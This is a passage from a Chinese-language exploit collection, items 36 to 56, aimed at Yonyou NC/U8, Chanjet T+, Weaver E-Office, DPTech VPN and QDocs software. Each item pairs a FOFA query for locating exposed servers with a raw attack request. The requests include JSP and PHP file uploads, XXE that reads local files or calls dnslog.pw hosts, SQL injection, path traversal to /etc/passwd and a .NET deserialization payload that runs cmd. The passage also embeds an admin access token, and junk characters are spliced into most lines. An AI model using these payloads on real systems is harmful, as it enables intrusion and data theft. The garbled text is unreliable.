User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
/ S R0 d( Y2 k* s8 |* j2 OAccept-Encoding: gzip, deflate' z3 n6 @ N6 d% Z% E1 P
Accept: */*
) N* a5 `/ s4 N/ i: o! o, BConnection: close
- N3 I. ~0 _/ C; HaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
5 h! o) e3 W2 CContent-Length: 190
) O* `( T; j6 I; G/ ^2 ]9 oContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df01 n% Q' N2 ?9 E/ H! u4 C
. k' n% g' {0 o7 K--fd28cb44e829ed1c197ec3bc71748df0
* ~1 s1 O* ^7 a$ z. c' B8 d0 f+ U& FContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
9 u; C, v6 t5 F( [3 ^& h
1 `( @- c6 ` ]<%out.println(1111*1111);%>' r% n! m' e8 P9 m6 _+ e; K
--fd28cb44e829ed1c197ec3bc71748df0--
% F+ _: [" _: j( j7 ~+ y- T( ~
/ u/ v; f2 f; ~; ~$ w2 l' k0 b' J' G
2 F, n% Z( [" @36. 用友NC-Cloud soapFormat XXE
l6 Z; x% r4 nFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 z' ^& Z, a/ Y; [/ `6 sPOST /uapws/soapFormat.ajax HTTP/1.1
) e3 R( M# W& P3 ^" }" Z* lHost: 192.168.40.130:8989
8 J# @% ^# [0 y9 W' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0; A8 W! u1 H9 ]" s: R' X
Content-Length: 2630 s* w6 K( G1 ~' F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& P0 l1 B# p7 r5 [/ E8 v- L
Accept-Encoding: gzip, deflate# a* O) C, G8 h! z+ ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 h8 u' o; {' z; ~2 C- q" @. }
Connection: close
$ `) k- d4 v6 r2 K" \Content-Type: application/x-www-form-urlencoded
; O7 f! E) B9 ?1 K) [. F& O0 mUpgrade-Insecure-Requests: 1& n5 o5 k4 y3 U3 r3 y% t) b$ b
+ w( t" W% \& y" G1 s" z! n
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a0 Q- w9 G, H8 u0 ^# H
" g. A1 ^/ U( m, r5 I5 R6 J) T$ w8 _
37. 用友NC-Cloud IUpdateService XXE
6 ~8 Y9 s# g3 g$ [( p. g4 l1 E( BFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
: r' h# [3 g! jPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
. \7 k# T. Y( {! W/ V. I* b+ YHost: 192.168.40.130:89899 E. w; v" P1 O* Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.368 [: G% o7 x& T* R7 [ L, @
Content-Length: 421% q& s1 p0 k7 a. o/ c% m/ k, v) ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& O5 B' _0 `; B7 e: N* S& @" O
Accept-Encoding: gzip, deflate# S% U6 u- R: A+ o) h
Accept-Language: zh-CN,zh;q=0.9, P$ Y' G' q8 f2 @" I' Z% Y# v; l
Connection: close" _% k7 \, e$ i( S& H
Content-Type: text/xml;charset=UTF-88 A8 F$ V* ?$ E
SOAPAction: urn:getResult2 Z# C1 u" Y$ |* @
Upgrade-Insecure-Requests: 1
) u5 t+ w v8 P. E3 U
9 b2 a; g5 d) `$ @1 \+ K<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
0 O4 `3 \; d9 O- o0 J<soapenv:Header/>, ?6 D- u, n+ T1 Z
<soapenv:Body>
+ p' N1 Q: G' V3 t' \<iup:getResult>
) d1 S& N5 V4 I# F z<!--type: string-->
) y! o6 |: o9 P. u, V; s<iup:string><![CDATA[ Q0 g0 y* _- ~+ Y- U: ^
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
2 f' u; j; n3 P# U( P' E+ v<xxx/>]]></iup:string>4 U0 D/ B. @0 O
</iup:getResult>
2 ~% y; t x4 ]* H" ]7 g6 P</soapenv:Body>" s! P9 ?2 H$ Z. N0 [/ O5 a
</soapenv:Envelope>
6 i- X. `3 H$ M. k& t. H, C- ?
/ X- O. v# k7 [2 P3 @6 M# R1 U' m
0 m& T8 A- X% }3 j- Z
# h# w0 M5 t+ [1 S38. 用友U8 Cloud smartweb2.RPC.d XXE0 ~7 K0 J, O* x: F$ ]
FOFA:app="用友-U8-Cloud"0 Y- T1 F; P# o6 f- Q/ {6 L2 p
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.17 B- K# t# l2 l' R: T
Host: 192.168.40.131:8088' B p1 V+ K V' L( Y# L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25& G3 n; `3 J& Q1 {8 ?7 n7 v! @$ J
Content-Length: 260
% l# }: O4 ^3 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b35 k) g! ^1 J9 P0 u
Accept-Encoding: gzip, deflate
& L& u% ]+ L. @1 y7 x0 m8 ?3 NAccept-Language: zh-CN,zh;q=0.9
% ~: I" O; Q5 ~+ GConnection: close8 T$ W7 D+ H% P4 Z& ~1 Y
Content-Type: application/x-www-form-urlencoded4 `- U& ^ G% f2 \
5 _2 j8 P9 p: a: ~& Q7 y__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
# }6 \- j% v! E/ Q# [: c# r8 m D( Y
7 K3 J% ^. ]7 |* O39. 用友U8 Cloud RegisterServlet SQL注入
; Q" s9 O6 d& ]8 k8 ]7 NFOFA:title="u8c"
2 ~3 U( N* O, S% y" o% ^. x5 P7 ePOST /servlet/RegisterServlet HTTP/1.1! A6 [8 L3 w+ e( R4 |: ?# n. P
Host: 192.168.86.128:8089
3 ^' p ]/ \; ^1 x6 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
. t! B& Y, v0 _( S( d: e+ x# DConnection: close
% f4 q l! V( G) T" DContent-Length: 859 @; n0 q5 _( j" V
Accept: */*
& ~: B( \2 J8 Y( ^* G vAccept-Language: en
7 ~ C* r2 B; ?% h- p: G1 e/ NContent-Type: application/x-www-form-urlencoded
- \, y# O" s X$ @6 B1 y1 M) {X-Forwarded-For: 127.0.0.1
, w7 p. Z9 r9 v2 d/ y/ |Accept-Encoding: gzip6 [9 o, x- B, ?7 v
5 I5 F5 e `/ t( E) Musercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
. v2 U" M1 C, K9 C
2 ~! o$ @+ Z( l- d7 J1 T s7 E _' [' @* ?- M
40. 用友U8-Cloud XChangeServlet XXE
* e) [) O7 @* p' `FOFA:app="用友-U8-Cloud"* v, _1 S1 c$ K; ]- L
POST /service/XChangeServlet HTTP/1.1
* u! y1 T& G1 @. }' ^/ A) vHost: x.x.x.x
" o% B" ?9 R# a( t% L* X4 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Y6 Q5 `: b: ]Content-Type: text/xml. U) V& c* [1 {) Q! `8 |
Connection: close
3 [. `+ T* S4 S+ [
9 Y5 o0 [6 K; C! k; |' v5 R4 E<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r># Y: a. S5 ~+ k8 ~+ J7 U$ `
/ O' E+ h6 u0 o
9 E! ~8 K" ?1 [- ^41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
8 r: C9 ?# _* CFOFA:app="用友-U8-Cloud"8 @ Z; k. ~* S5 p: P: l7 G
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.12 f6 ~( t1 Z$ m) j4 y' ]+ J: r
Host:
! d) [6 C# N3 h2 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- x! o. }( y3 j% x% `9 o
Content-Type: application/json
5 g9 T- N2 J' X. u) E# RAccept-Encoding: gzip; o: U( o: Y# P: _
Connection: close
% O8 i" [% k* i, q3 N
- y( Z: q& t2 t0 e5 }' T7 N* @8 `$ n( G8 w2 n3 \1 U
42. 用友GRP-U8 SmartUpload01 文件上传
# D, ?. X6 A2 i/ {2 ?FOFA:app="用友-GRP-U8"
e2 H2 O+ ~9 g& ]; x% N6 IPOST /u8qx/SmartUpload01.jsp HTTP/1.1
K& O6 L$ T5 S# m3 UHost: x.x.x.x/ I9 h# {& J [* j x7 T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
) f- }1 @! S/ K% B. a% EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
e$ P$ r, S% `1 C& x! S
5 g0 _. c1 J4 E+ q' UPAYLOAD
# T* l( V; ? X0 m) v. J4 W1 G7 T0 J5 H' P0 M$ o" f
% `3 |8 E) z& E7 j2 R9 Shttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
/ a1 d' Q# s0 p3 y+ F
* c5 A5 ~$ _" B0 F43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( s/ c1 g7 O tFOFA:app="用友-GRP-U8"4 j6 }, N: U4 ^. _4 a7 |
POST /services/userInfoWeb HTTP/1.1
- |' v# f' f( o5 d1 BHost: your-ip
6 M. t/ R" \; HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& v$ L- L# p; Q" }# y$ i0 p4 N. dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ _# @! E6 u3 _- {( v: P4 g* ?' a# B
Accept-Encoding: gzip, deflate# N {* J; H) B/ G4 a D
Accept-Language: zh-CN,zh;q=0.9
: g" E4 f* s! v- x: [- a3 T; DConnection: close% D. e. Q9 g0 E7 b8 v0 d
SOAPAction:
& B2 O& b, p, o7 {: pContent-Type: text/xml;charset=UTF-8/ r7 @2 J, d) @& |
) j# t3 ?5 _1 J# Y<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">: ?& e' ^; @/ i8 X& ]2 r
<soapenv:Header/>& _" O9 k* i ^* a0 \+ A
<soapenv:Body>
# B5 \0 G# T( W U# x6 T8 T <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">$ y; C$ D$ T, G$ a8 g. Y% C
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
, D( @( }" s! D" U# E8 ] </ser:getUserNameById>( v$ e) x6 w; v( _
</soapenv:Body>
; \4 Z: H/ a6 V% T</soapenv:Envelope>" Y2 O2 l8 ^% {+ H8 w3 w
9 g2 B# \: Z: @4 H
0 j/ P; M) P5 X
44. 用友GRP-U8 bx_dj_check.jsp SQL注入5 h* D J; O- Y: [! S
FOFA:app="用友-GRP-U8"
+ b& Z" A( M+ g/ XGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
2 m8 h+ k; ?' O2 SHost: your-ip
( ~- U0 K# K' A W5 d1 q+ u! S4 i9 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" f2 p, s5 u8 i9 X3 D ~4 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" T& L# a N7 q0 p, D' NAccept-Encoding: gzip, deflate
7 Q' b/ r# F, h! {: ^! n3 RAccept-Language: zh-CN,zh;q=0.9
& S: v3 w$ g1 b; z' MConnection: close4 M6 Q C$ }, d; \
; X3 J+ x+ p9 g) K9 [0 F& `4 @5 M! j
45. 用友GRP-U8 ufgovbank XXE/ m* f0 b9 s8 D
FOFA:app="用友-GRP-U8"2 l. |! P$ V: l! @; N: i0 ]
POST /ufgovbank HTTP/1.1
- U+ b0 x+ P' ?2 f) G% DHost: 192.168.40.130:222( U# h Y- A. j! b, V# u1 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0/ `7 n3 N% } ]: z% n
Connection: close! G- h" F. @' Y) i" B$ }, r
Content-Length: 161
8 u3 |6 v+ H* i2 e; _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# p4 N. p! U: g, }% I1 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ L0 o, s7 f* ^! @" ]
Content-Type: application/x-www-form-urlencoded
; m- a( X0 V+ j7 @$ F2 MAccept-Encoding: gzip; |4 \$ n1 t* h8 ]( q* k2 G, b
! O1 c" J- L; t2 W: T9 H0 s, ~reqData=<?xml version="1.0"?>
( O3 e$ k# j0 r2 B+ Z<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest5 C" i: |5 R/ w
o' o2 z1 x1 o0 K- V
. Z' o- I- d; g46. 用友GRP-U8 sqcxIndex.jsp SQL注入: w/ V" U* T8 Q9 L/ C- q8 P
FOFA:app="用友-GRP-U8"
% u) V B: m5 `: {" XGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
( G" p; @8 U( s HHost: your-ip
% k! U h. m; H2 b/ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" O4 i( g. N0 \/ M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ E: ^1 S! ^( x% I( G, E9 ]Accept-Encoding: gzip, deflate
. l H1 A8 o( FAccept-Language: zh-CN,zh;q=0.9- o3 w" \0 n! v* F
Connection: close' ?' A1 E: l* t0 J, u7 s9 x3 {
( a3 H! v0 q5 l( ]+ S- W' |5 O; @' O( _* c' d
47. 用友GRP A++Cloud 政府财务云 任意文件读取- K, e3 c s3 z4 ?
FOFA:body="/pf/portal/login/css/fonts/style.css"
+ D( z: \7 }7 n9 Z: DGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
2 \" f2 V( n7 c% W' iHost: x.x.x.x; K7 n# v! k' O" j8 [/ S
Cache-Control: max-age=0% T7 z: ~. Z* l8 [. G* M; J
Upgrade-Insecure-Requests: 1
5 o+ z, M0 K) L' h; y1 C5 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# N M7 k3 z9 L J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ q. A x& L6 T% G
Accept-Encoding: gzip, deflate, br. C6 |+ M/ D. c( S( i
Accept-Language: zh-CN,zh;q=0.9
8 P. Q+ n9 G$ }, H% b4 XIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
9 f" u& [+ ^+ N5 zConnection: close$ ^1 B1 R- @# f6 m, ?) U5 G
7 R1 O) s6 a& m4 g* g4 h
: u! N8 k1 {$ U2 \, _: \6 j C) ?- ^% t; a
48. 用友U8 CRM swfupload 任意文件上传
& X& W3 B% @: C& PFOFA:title="用友U8CRM"( u+ N) D7 c% s9 ^$ t
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
( V( P# Q( E, b, JHost: your-ip: z/ h5 w6 N! }! O. s5 _& H: }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ K# U% ^; I" T6 D! _: P6 Z! l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 q, I! l% R l4 |0 t5 P& wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 V* v5 J: A# }) @' ~7 |0 OAccept-Encoding: gzip, deflate& o U6 `) C7 I9 }' p5 l5 F( ]. H, k
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
: V q% Y- u) `5 f+ m. t* j, v------269520967239406871642430066855
+ C5 P4 N, V3 P4 k7 NContent-Disposition: form-data; name="file"; filename="s.php"
$ i. j% r' o/ }/ }; O1231) L Z: e( v' H t9 N/ p, w
Content-Type: application/octet-stream" v+ X5 g: \! w3 x d
------269520967239406871642430066855
- \6 [3 ^2 X5 U, xContent-Disposition: form-data; name="upload". f$ {. D' x% w/ _5 f
upload
* i9 e9 m8 j9 \+ b------269520967239406871642430066855--( ]7 ~0 u2 h: j
7 D7 g. Z8 b: W! w
3 T! H" }: F. A3 n3 d# k( y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传1 v5 i: B9 ?5 H g$ p/ C- b
FOFA:body="用友U8CRM"
& S2 [, z- O' Z9 V
! ]7 b' K* ^# Z3 APOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
7 f) X8 @6 f4 V0 h! v4 G- VHost: x.x.x.x
/ a/ v& @: J" ~( t xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 e5 C- A% p9 |- j& i4 E$ @" B. VContent-Length: 329. `9 R# ^2 c5 x# M+ W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! O- s1 k% Z9 E( K4 B9 I6 B5 KAccept-Encoding: gzip, deflate
6 x& N' m' o# y) J2 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 ?+ s5 d' K, f" K7 X& ~$ NConnection: close+ u7 ^0 [6 C/ V* F$ ^
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
/ b6 O; I Y# [+ y
2 y' V0 I$ x* a5 A6 {-----------------------------vvv3wdayqv3yppdxvn3w! L- g! a# B1 n; g. A7 d2 E' k! c
Content-Disposition: form-data; name="file"; filename="%s.php "7 _& e) b3 W: w9 h
Content-Type: application/octet-stream
5 b( F: {+ L2 A7 p) y! m9 W, A
- J6 @" r3 Y! D( h, z8 B+ l8 ?$ swersqqmlumloqa
2 N2 M7 l; A9 |4 [-----------------------------vvv3wdayqv3yppdxvn3w2 D2 v" S+ r; O( V) q# l+ Q) _0 a% b
Content-Disposition: form-data; name="upload"
7 U/ ]6 @, P& `: s8 I! l0 O0 T4 n
# d8 c% P0 @( Z8 Y4 G" U. xupload
9 k! i& i+ C1 A4 |( S-----------------------------vvv3wdayqv3yppdxvn3w--
1 Q" {! R% m2 }% z! H- W& S# G* i$ f0 w+ C8 ?
" u. V9 j. D. D- P2 r* }http://x.x.x.x/tmpfile/updB3CB.tmp.php
: i/ U/ |/ s2 G! v9 m1 O D0 A |# W' f# _) X0 H, t
50. QDocs Smart School 6.4.1 filterRecords SQL注入4 c$ d' c& z, q+ E S
FOFA:body="close closebtnmodal"
) o) W% N8 s3 M" S2 Q! [! s2 FPOST /course/filterRecords/ HTTP/1.15 c2 T! B5 h( I, Q
Host: x.x.x.x
# r# \. h$ i- c/ R( o; [; |9 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 w# ?7 E) Z+ L1 f# e- x
Connection: close
1 t3 ^$ y8 | u7 c3 |Content-Length: 224
8 e% L& n2 g1 H* p vAccept: */*
) \, V" E5 w, @* NAccept-Language: en& m8 V6 N2 H' s$ m4 M6 b
Content-Type: application/x-www-form-urlencoded, G' E: f" C8 m$ j* ?% y; q) m' w
Accept-Encoding: gzip& G0 `# V! }, i2 }9 e
/ k/ Z" {- [( U* Xsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
# [- S7 c# R3 ?/ F
2 v, ?2 l: b" y* @& J+ }! B
9 A) v/ c' j. ~1 G0 T" @51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
! T7 @( r; Y+ k4 KFOFA:app="云时空社会化商业ERP系统"+ R0 w9 D7 H; [, O3 O
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.19 }% e J" y& ~/ f
Host: your-ip$ c8 b9 o% U3 ^/ w$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36* M. b5 x7 M, j! B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! L8 @ [' f) A' G4 n/ BAccept-Encoding: gzip, deflate
) l/ E' T; I; I& u" ~# HAccept-Language: zh-CN,zh;q=0.9
- l$ |: C% i# @/ p( L$ `9 d( rConnection: close
. R) h/ @. i) E3 }. I$ v1 i0 m9 m1 c
& K6 Q& U- H" b/ I$ ^1 V: {
9 j- _3 A4 k& n52. 泛微E-Office json_common.php sql注入4 U) K; {$ Z' I) z8 D
FOFA:app="泛微-EOffice"
$ S& T3 f$ H- j1 c: e* ]POST /building/json_common.php HTTP/1.1% j. U3 A% g! W9 `7 z" m
Host: 192.168.86.128:8097% K1 N0 p2 A6 R3 g
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 U) w! @+ r3 c( D0 E; Q8 r
Connection: close' h0 b! Y6 O6 W$ T* X, A7 e$ T
Content-Length: 87
. i3 n! b; S% D f. r% E8 CAccept: */*: [4 z' O5 S, {# T: z# a
Accept-Language: en+ O, Q& J+ W1 u7 H
Content-Type: application/x-www-form-urlencoded
& i7 W" ~# E$ OAccept-Encoding: gzip
, t! K& o+ W8 R$ f/ V0 g; M% c& F: K) s" K N, B" U
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
# h5 [3 f n9 Z3 b) ^7 L H8 Z* W, H! t1 a8 F
4 z: D' k; F/ z3 N) H1 u) S) A
53. 迪普 DPTech VPN Service 任意文件上传3 s( |, ?: o7 r" A+ v( F- }
FOFA:app="DPtech-SSLVPN"6 }; D" r* k4 x
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' [; g* F) v4 K) G- L' B
% v* ?0 L5 T$ g3 y6 G5 C/ l" ^. t
5 d0 o) l8 V& r# E3 [/ u+ {54. 畅捷通T+ getstorewarehousebystore 远程代码执行7 t* d8 N$ S. F0 ?. Q" v
FOFA:app="畅捷通-TPlus"
7 z5 ^6 C( b+ g: B# p第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件1 ` H8 F; T9 J+ _/ v3 Z% p
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 {6 \( p( Z9 b' h4 F, ?% \
X: s$ x9 `$ T% ]$ B2 I) E# x9 [, A0 d8 b. ^
完整数据包$ h$ ~1 ?9 z3 J' Q+ l
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1* d( m6 v, A. J# ?3 ?
Host: x.x.x.x
; a- ]5 H4 z# d( I9 rUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F) Y/ O+ t) V; Z x, p- O
Content-Length: 593; n8 u9 x% j4 {2 J( i
; T$ F2 P" A8 k# V4 i$ U
{7 h* s% J. x7 c, `6 v/ @- X- _2 s
"storeID":{
0 Q; A u A8 \) d; n7 x, p: F! h "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
3 I0 {# L7 R, m6 \ "MethodName":"Start",
& K# c7 Y% G6 G "ObjectInstance":{
, H6 v h I4 [, k4 F "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; ]- \) `) g9 U4 t0 v" v2 E; Q "StartInfo":{! ?& ]$ G/ Z4 b1 A6 k5 R& v
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 E# r0 }' C8 W0 w) Q# a9 s. \
"FileName":"cmd",6 f: j& f6 O, p* F0 x3 w
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
- j# I- F4 g* } u! t$ C }
: ~1 }- p7 j: l7 [5 U% c4 q2 L }- J: L/ _1 I1 [
}, P' M {8 p A
}
1 { t; \! I$ Y! K: @! d4 p% u2 D1 R
. `3 O+ V' x: l' X" A: x2 l1 `第二步,访问如下url R7 k3 r+ } {# @! c
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt0 H9 Z& f% m0 l4 s4 T2 n: V
3 ?" l4 E* A- U$ v% x1 I
; I+ f8 {/ V: T# w4 \& z' g55. 畅捷通T+ getdecallusers信息泄露6 C( `+ [0 U. c" i/ H" a
FOFA:app="畅捷通-TPlus"
7 B5 R& V; G! q第一步,通过" c: g/ z- |1 y1 ]7 X5 B0 g
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
6 T: b4 O& t# L) d$ O; _- v" J第二步,利用获取到的Cookie请求
8 h4 K( r5 s) n0 H/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
4 ^+ Q' S9 D' b6 \
4 a8 D) C$ P# B0 ~: o56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE2 T4 {- L; v2 }9 A. @
FOFA: app="畅捷通-TPlus"+ m/ n# Z4 Z2 z8 _( j4 i/ E/ |! `
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1( }' e! u' L" h# Y( v' d' ~
Host: x.x.x.x
& _" @& ]. q5 D, C: x FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
( |2 g2 ]7 A1 C! n, V/ hContent-Type: application/json' j; ]4 D0 j. Z+ O0 G X9 U4 @
{0 m6 \( W9 W8 b3 D
{3 \! a- T2 Z( {5 [! W
"storeID":{+ O2 j5 I+ Z9 ?& U/ y, B
